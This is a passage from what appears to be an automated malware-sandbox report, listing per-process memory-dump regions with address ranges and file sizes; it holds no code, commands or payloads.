                          • memory/1244-315-0x0000020083E00000-0x0000020083E2A000-memory.dmp
                            Filesize

                            168KB

                          • memory/1244-204-0x00007FFC95270000-0x00007FFC95280000-memory.dmp
                            Filesize

                            64KB

                          • memory/1308-320-0x00000205F8BC0000-0x00000205F8BEA000-memory.dmp
                            Filesize

                            168KB

                          • memory/1308-203-0x00007FFC95270000-0x00007FFC95280000-memory.dmp
                            Filesize

                            64KB

                          • memory/1360-175-0x0000000000000000-mapping.dmp
                          • memory/1364-224-0x00007FFC95270000-0x00007FFC95280000-memory.dmp
                            Filesize

                            64KB

                          • memory/1388-319-0x000001B4A9330000-0x000001B4A935A000-memory.dmp
                            Filesize

                            168KB

                          • memory/1388-202-0x00007FFC95270000-0x00007FFC95280000-memory.dmp
                            Filesize

                            64KB

                          • memory/1396-208-0x00007FFC95270000-0x00007FFC95280000-memory.dmp
                            Filesize

                            64KB

                          • memory/1492-206-0x00007FFC95270000-0x00007FFC95280000-memory.dmp
                            Filesize

                            64KB

                          • memory/1552-207-0x00007FFC95270000-0x00007FFC95280000-memory.dmp
                            Filesize

                            64KB

                          • memory/1576-212-0x00007FFC95270000-0x00007FFC95280000-memory.dmp
                            Filesize

                            64KB

                          • memory/1608-312-0x0000022CC2B70000-0x0000022CC2B9A000-memory.dmp
                            Filesize

                            168KB

                          • memory/1608-261-0x00007FFC95270000-0x00007FFC95280000-memory.dmp
                            Filesize

                            64KB

                          • memory/1628-211-0x00007FFC95270000-0x00007FFC95280000-memory.dmp
                            Filesize

                            64KB

                          • memory/1652-209-0x00007FFC95270000-0x00007FFC95280000-memory.dmp
                            Filesize

                            64KB

                          • memory/1696-210-0x00007FFC95270000-0x00007FFC95280000-memory.dmp
                            Filesize

                            64KB

                          • memory/1764-219-0x00007FFC95270000-0x00007FFC95280000-memory.dmp
                            Filesize

                            64KB

                          • memory/1772-289-0x000002207DD40000-0x000002207DD6A000-memory.dmp
                            Filesize

                            168KB

                          • memory/1772-286-0x0000000000000000-mapping.dmp
                          • memory/1772-291-0x000002207E150000-0x000002207E17A000-memory.dmp
                            Filesize

                            168KB

                          • memory/1820-166-0x0000000000000000-mapping.dmp
                          • memory/1824-214-0x00007FFC95270000-0x00007FFC95280000-memory.dmp
                            Filesize

                            64KB

                          • memory/1828-223-0x00007FFC95270000-0x00007FFC95280000-memory.dmp
                            Filesize

                            64KB

                          • memory/1860-218-0x00007FFC95270000-0x00007FFC95280000-memory.dmp
                            Filesize

                            64KB

                          • memory/1868-217-0x00007FFC95270000-0x00007FFC95280000-memory.dmp
                            Filesize

                            64KB

                          • memory/1884-195-0x0000000000000000-mapping.dmp
                          • memory/1900-216-0x00007FFC95270000-0x00007FFC95280000-memory.dmp
                            Filesize

                            64KB

                          • memory/1964-215-0x00007FFC95270000-0x00007FFC95280000-memory.dmp
                            Filesize

                            64KB

                          • memory/2036-213-0x00007FFC95270000-0x00007FFC95280000-memory.dmp
                            Filesize

                            64KB

                          • memory/2044-281-0x000001F891A00000-0x000001F891A2A000-memory.dmp
                            Filesize

                            168KB

                          • memory/2112-318-0x0000000000000000-mapping.dmp
                          • memory/2128-349-0x0000000000000000-mapping.dmp
                          • memory/2132-148-0x0000000000000000-mapping.dmp
                          • memory/2176-196-0x0000000000000000-mapping.dmp
                          • memory/2176-199-0x00007FFCB62C0000-0x00007FFCB6D81000-memory.dmp
                            Filesize

                            10.8MB

                          • memory/2192-163-0x0000000000000000-mapping.dmp
                          • memory/2200-222-0x00007FFC95270000-0x00007FFC95280000-memory.dmp
                            Filesize

                            64KB

                          • memory/2228-187-0x0000000140000000-0x0000000140040000-memory.dmp
                            Filesize

                            256KB

                          • memory/2228-188-0x00007FFCD51F0000-0x00007FFCD53E5000-memory.dmp
                            Filesize

                            2.0MB

                          • memory/2228-184-0x0000000140000000-0x0000000140040000-memory.dmp
                            Filesize

                            256KB

                          • memory/2228-185-0x00000001400024C8-mapping.dmp
                          • memory/2228-191-0x00007FFCD4220000-0x00007FFCD42DE000-memory.dmp
                            Filesize

                            760KB

                          • memory/2228-194-0x00007FFCD51F0000-0x00007FFCD53E5000-memory.dmp
                            Filesize

                            2.0MB

                          • memory/2228-193-0x0000000140000000-0x0000000140040000-memory.dmp
                            Filesize

                            256KB

                          • memory/2228-186-0x0000000140000000-0x0000000140040000-memory.dmp
                            Filesize

                            256KB

                          • memory/2348-220-0x00007FFC95270000-0x00007FFC95280000-memory.dmp
                            Filesize

                            64KB

                          • memory/2356-368-0x0000000000000000-mapping.dmp
                          • memory/2364-232-0x00007FFC95270000-0x00007FFC95280000-memory.dmp
                            Filesize

                            64KB

                          • memory/2440-233-0x00007FFC95270000-0x00007FFC95280000-memory.dmp
                            Filesize

                            64KB

                          • memory/2452-192-0x00007FFCD4220000-0x00007FFCD42DE000-memory.dmp
                            Filesize

                            760KB

                          • memory/2452-189-0x00007FFCD51F0000-0x00007FFCD53E5000-memory.dmp
                            Filesize

                            2.0MB

                          • memory/2452-182-0x00007FFCD51F0000-0x00007FFCD53E5000-memory.dmp
                            Filesize

                            2.0MB

                          • memory/2452-183-0x00007FFCD4220000-0x00007FFCD42DE000-memory.dmp
                            Filesize

                            760KB

                          • memory/2452-172-0x00007FFCB62A0000-0x00007FFCB6D61000-memory.dmp
                            Filesize

                            10.8MB

                          • memory/2488-245-0x0000017C5DDC0000-0x0000017C5DDEA000-memory.dmp
                            Filesize

                            168KB

                          • memory/2488-238-0x00007FFC95270000-0x00007FFC95280000-memory.dmp
                            Filesize

                            64KB

                          • memory/2500-246-0x000001945F460000-0x000001945F48A000-memory.dmp
                            Filesize

                            168KB

                          • memory/2500-239-0x00007FFC95270000-0x00007FFC95280000-memory.dmp
                            Filesize

                            64KB

                          • memory/2576-178-0x0000000000000000-mapping.dmp
                          • memory/2576-284-0x0000000000000000-mapping.dmp
                          • memory/2576-294-0x000002154E8E0000-0x000002154E90A000-memory.dmp
                            Filesize

                            168KB

                          • memory/2604-240-0x00007FFC95270000-0x00007FFC95280000-memory.dmp
                            Filesize

                            64KB

                          • memory/2604-247-0x000001AC65270000-0x000001AC6529A000-memory.dmp
                            Filesize

                            168KB

                          • memory/2616-248-0x000002BB8A780000-0x000002BB8A7AA000-memory.dmp
                            Filesize

                            168KB

                          • memory/2616-241-0x00007FFC95270000-0x00007FFC95280000-memory.dmp
                            Filesize

                            64KB

                          • memory/2624-282-0x000002A98DDE0000-0x000002A98DE0A000-memory.dmp
                            Filesize

                            168KB

                          • memory/2624-181-0x0000000000000000-mapping.dmp
                          • memory/2664-242-0x00007FFC95270000-0x00007FFC95280000-memory.dmp
                            Filesize

                            64KB

                          • memory/2696-243-0x00007FFC95270000-0x00007FFC95280000-memory.dmp
                            Filesize

                            64KB

                          • memory/2720-244-0x00007FFC95270000-0x00007FFC95280000-memory.dmp
                            Filesize

                            64KB

                          • memory/2728-254-0x00007FFC95270000-0x00007FFC95280000-memory.dmp
                            Filesize

                            64KB

                          • memory/2728-274-0x00000262EEB70000-0x00000262EEB9A000-memory.dmp
                            Filesize

                            168KB

                          • memory/2872-170-0x0000000004740000-0x0000000004D68000-memory.dmp
                            Filesize

                            6.2MB

                          • memory/2872-180-0x0000000005650000-0x000000000566E000-memory.dmp
                            Filesize

                            120KB

                          • memory/2872-176-0x0000000004EE0000-0x0000000004F46000-memory.dmp
                            Filesize

                            408KB

                          • memory/2872-169-0x0000000004020000-0x0000000004056000-memory.dmp
                            Filesize

                            216KB

                          • memory/2872-174-0x0000000004600000-0x0000000004622000-memory.dmp
                            Filesize

                            136KB

                          • memory/2872-321-0x0000000007E50000-0x00000000084CA000-memory.dmp
                            Filesize

                            6.5MB

                          • memory/3112-283-0x000001A24A540000-0x000001A24A56A000-memory.dmp
                            Filesize

                            168KB

                          • memory/3112-256-0x00007FFC95270000-0x00007FFC95280000-memory.dmp
                            Filesize

                            64KB

                          • memory/3476-257-0x00007FFC95270000-0x00007FFC95280000-memory.dmp
                            Filesize

                            64KB

                          • memory/3476-285-0x000001F6F4280000-0x000001F6F42AA000-memory.dmp
                            Filesize

                            168KB

                          • memory/3516-311-0x0000015742E50000-0x0000015742E7A000-memory.dmp
                            Filesize

                            168KB

                          • memory/3744-287-0x000001CFD7A60000-0x000001CFD7A8A000-memory.dmp
                            Filesize

                            168KB

                          • memory/3744-258-0x00007FFC95270000-0x00007FFC95280000-memory.dmp
                            Filesize

                            64KB

                          • memory/3832-345-0x0000000000000000-mapping.dmp
                          • memory/3968-293-0x0000000000000000-mapping.dmp
                          • memory/3968-298-0x00000228D5B90000-0x00000228D5BBA000-memory.dmp
                            Filesize

                            168KB

                          • memory/4016-259-0x00007FFC95270000-0x00007FFC95280000-memory.dmp
                            Filesize

                            64KB

                          • memory/4016-299-0x000001BAA0700000-0x000001BAA072A000-memory.dmp
                            Filesize

                            168KB

                          • memory/4220-279-0x000001D0D9FF0000-0x000001D0DA01A000-memory.dmp
                            Filesize

                            168KB

                          • memory/4220-153-0x0000000000000000-mapping.dmp
                          • memory/4260-167-0x0000000000000000-mapping.dmp
                          • memory/4284-173-0x0000000000000000-mapping.dmp
                          • memory/4292-155-0x0000000000000000-mapping.dmp
                          • memory/4444-158-0x0000000140000000-0x0000000140057000-memory.dmp
                            Filesize

                            348KB

                          • memory/4444-156-0x0000000140000000-0x0000000140057000-memory.dmp
                            Filesize

                            348KB

                          • memory/4444-161-0x0000000140000000-0x0000000140057000-memory.dmp
                            Filesize

                            348KB

                          • memory/4444-159-0x0000000140000000-0x0000000140057000-memory.dmp
                            Filesize

                            348KB

                          • memory/4444-157-0x0000000140002348-mapping.dmp
                          • memory/4448-171-0x0000000000000000-mapping.dmp
                          • memory/4744-262-0x00007FFC95270000-0x00007FFC95280000-memory.dmp
                            Filesize

                            64KB

                          • memory/4744-313-0x0000020091480000-0x00000200914AA000-memory.dmp
                            Filesize

                            168KB

                          • memory/4812-135-0x0000000000030000-0x0000000000278000-memory.dmp
                            Filesize

                            2.3MB

                          • memory/4812-140-0x00007FFCB62A0000-0x00007FFCB6D61000-memory.dmp
                            Filesize

                            10.8MB

                          • memory/4812-130-0x0000000000000000-mapping.dmp
                          • memory/4812-154-0x000000001D2F0000-0x000000001D302000-memory.dmp
                            Filesize

                            72KB

                          • memory/4852-150-0x00000000058A0000-0x0000000005906000-memory.dmp
                            Filesize

                            408KB

                          • memory/4852-177-0x0000000006480000-0x0000000006512000-memory.dmp
                            Filesize

                            584KB

                          • memory/4852-162-0x00000000069F0000-0x0000000006F94000-memory.dmp
                            Filesize

                            5.6MB

                          • memory/4852-143-0x0000000000400000-0x0000000000422000-memory.dmp
                            Filesize

                            136KB

                          • memory/4852-142-0x0000000000000000-mapping.dmp
                          • memory/4892-317-0x000002056A8B0000-0x000002056A8DA000-memory.dmp
                            Filesize

                            168KB

                          • memory/4892-302-0x0000000000000000-mapping.dmp
                          • memory/5072-307-0x0000000000000000-mapping.dmp
                          • memory/5072-309-0x00000297E4930000-0x00000297E495A000-memory.dmp
                            Filesize

                            168KB

                          • memory/5072-308-0x00000297E4900000-0x00000297E492A000-memory.dmp
                            Filesize

                            168KB

                          • memory/5096-168-0x0000000000000000-mapping.dmp
                          • memory/5112-296-0x00000157BE4A0000-0x00000157BE4CA000-memory.dmp
                            Filesize

                            168KB

                          • memory/5112-292-0x0000000000000000-mapping.dmp